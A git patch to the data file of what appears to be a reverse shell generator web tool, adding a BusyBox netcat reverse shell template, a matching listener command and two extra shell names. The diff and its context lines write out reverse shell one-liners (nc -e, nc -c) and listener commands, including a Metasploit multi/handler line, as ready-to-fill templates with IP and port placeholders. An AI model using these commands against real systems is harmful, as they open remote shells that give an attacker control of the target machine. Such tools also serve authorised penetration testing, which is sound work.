From 7572a719f72731b69c9c764c5e447e469ac7bfe1 Mon Sep 17 00:00:00 2001 From: containedreality Date: Fri, 23 Dec 2022 13:12:51 -0500 Subject: [PATCH] Added some busybox nc support. And added new shells. --- js/data.js | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/js/data.js b/js/data.js index a9cbe52..6f55e3c 100644 --- a/js/data.js +++ b/js/data.js @@ -60,6 +60,11 @@ const reverseShellCommands = withCommandType( "command": "nc.exe {ip} {port} -e {shell}", "meta": ["windows"] }, + { + "name": "BusyBox nc -e", + "command": "busybox nc {ip} {port} -e {shell}", + "meta": ["linux"] + }, { "name": "nc -c", "command": "nc -c {shell} {ip} {port}", @@ -455,6 +460,7 @@ const rsgData = { listenerCommands: [ ['nc', 'nc -lvnp {port}'], + ['busybox nc', 'busybox nc -lp {port}'], ['ncat', 'ncat -lvnp {port}'], ['ncat.exe', 'ncat.exe -lvnp {port}'], ['ncat (TLS)', 'ncat --ssl -lvnp {port}'], @@ -469,7 +475,7 @@ const rsgData = { ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'] ], - shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'], + shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'], upgrade: ['python', ],